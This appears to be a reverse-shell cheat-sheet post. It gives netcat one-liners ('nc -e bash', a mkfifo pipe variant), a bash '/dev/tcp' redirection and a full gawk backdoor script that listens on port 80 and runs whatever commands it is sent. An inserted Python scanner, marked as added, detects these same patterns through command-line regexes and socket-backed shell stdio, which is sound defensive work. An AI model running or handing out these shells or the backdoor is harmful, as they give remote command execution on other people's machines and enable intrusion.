On the shell receiving side:
nc -l 80
On the shell sending side:
nc <receiving machine ip> 80 -e <command e.g. bash>
If there is no -e option for your netcat:
unlink pipe; mkfifo pipe && nc <your ip> 80 <pipe | <command e.g. bash> &>pipe; unlink pipe
A side effect worth knowing: this only mirrors the sending side's output remotely. You still control the shell from the shell sending side, which sees nothing echoed back; only the shell receiving side sees the output:
On the shell sending side:
bash -i >& /dev/tcp/<receiving machine ip>/80
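A defender-side counterpart to the one-liners above, added here as an example (it is not code from the original post or from the linked sources): a small Linux host check that flags processes whose command line matches the patterns shown on this page (the `/dev/tcp` redirection, `nc -e`, the `mkfifo` pipe), and, separately, shells whose stdout or stderr is a socket rather than a tty, which is exactly what `bash -i >& /dev/tcp/...` leaves behind while stdin stays on the terminal. The regexes, the `SHELLS` set and the `192.0.2.x` sample addresses are constructed for the example; `/proc/PID/comm`, `/proc/PID/cmdline` and `/proc/PID/fd/N` are the standard Linux procfs entries.

```python
# Added example (not from the original post): host-side detection of the
# reverse-shell patterns shown above. Two independent checks:
#   1. classify_cmdline()    - heuristic regexes over a process command line
#                               (from auditd execve records or /proc/PID/cmdline)
#   2. socket_backed_stdio() - a shell whose stdin/stdout/stderr is a socket,
#                               which is what "bash -i >& /dev/tcp/..." produces
# scan_proc() wires both checks to the live /proc tree on Linux.
import os
import re
from typing import Dict, Iterator, List, Tuple

# Heuristic indicators taken from the one-liners in the post. They are plain
# string matches and will miss obfuscated variants; tune them before use.
CMDLINE_PATTERNS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/(tcp|udp)/")),
    ("netcat -e execution", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("mkfifo + netcat pipe", re.compile(r"\bmkfifo\b.*\b(nc|ncat|netcat)\b")),
    ("gawk /inet socket", re.compile(r"/inet/(tcp|udp)/")),  # inline awk programs only
]

# Interpreters whose stdio should normally be a tty, a pipe or a file, not a socket.
SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the name of every CMDLINE_PATTERNS entry that matches."""
    return [name for name, pat in CMDLINE_PATTERNS if pat.search(cmdline)]


def socket_backed_stdio(comm: str, fd_targets: Dict[int, str]) -> bool:
    """True when a shell process has fd 0, 1 or 2 attached to a socket.

    comm       -- process name as in /proc/PID/comm (e.g. "bash")
    fd_targets -- fd number -> readlink(/proc/PID/fd/N) target, e.g. "socket:[4711]"
    """
    if os.path.basename(comm) not in SHELLS:
        return False
    return any(fd_targets.get(fd, "").startswith("socket:") for fd in (0, 1, 2))


def read_proc_entry(pid_dir: str) -> Tuple[str, str, Dict[int, str]]:
    """Read comm, cmdline and the stdio fd targets of one /proc/PID directory."""
    with open(os.path.join(pid_dir, "comm")) as f:
        comm = f.read().strip()
    with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
        # argv is NUL-separated in procfs; join it back into one line
        cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
    fd_targets: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            fd_targets[fd] = os.readlink(os.path.join(pid_dir, "fd", str(fd)))
        except OSError:  # fd closed, or we lack permission to read the link
            pass
    return comm, cmdline, fd_targets


def scan_proc(proc_root: str = "/proc") -> Iterator[Tuple[int, str, List[str]]]:
    """Yield (pid, comm, reasons) for every live process that trips a check.

    Run as root to see other users' fd links; unreadable entries are skipped.
    """
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            comm, cmdline, fd_targets = read_proc_entry(os.path.join(proc_root, name))
        except OSError:  # process exited mid-scan or is not readable
            continue
        reasons = classify_cmdline(cmdline)
        if socket_backed_stdio(comm, fd_targets):
            reasons.append("shell with socket-backed stdio")
        if reasons:
            yield int(name), comm, reasons


if __name__ == "__main__":
    for pid, comm, reasons in scan_proc():
        print(f"pid {pid} ({comm}): {', '.join(reasons)}")
```

The fd check is the more robust of the two: it does not depend on how the command was spelled, only on where the shell's standard streams point, so it also catches the `/dev/tcp` variant even though nothing network-related is visible in `ps` output. The command-line regexes are cheap to run over an audit log but are easy to evade, so treat them as a first-pass filter rather than a verdict.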
Or, if there is no netcat on the receiving side, you can use gawk:
Source: http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387
gawk_rev_sh.awk:
#!/usr/bin/gawk -f
BEGIN {
    Port = 80
    Prompt = "bkd> "
    # gawk's special file "/inet/tcp/LPORT/0/0" opens a listening TCP socket
    # on local port LPORT (remote host and port 0 select server mode)
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service         # send the prompt to the client
            Service |& getline cmd           # read one command line from it
            if (cmd) {
                while ((cmd |& getline) > 0) # run cmd as a coprocess and
                    print $0 |& Service      # relay each output line back
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)                       # drop the client, then listen again
    }
}
Afterwards you can connect via
nc <receiving machine ip> 80
bkd>
Other good ideas about reverse shells here:
http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html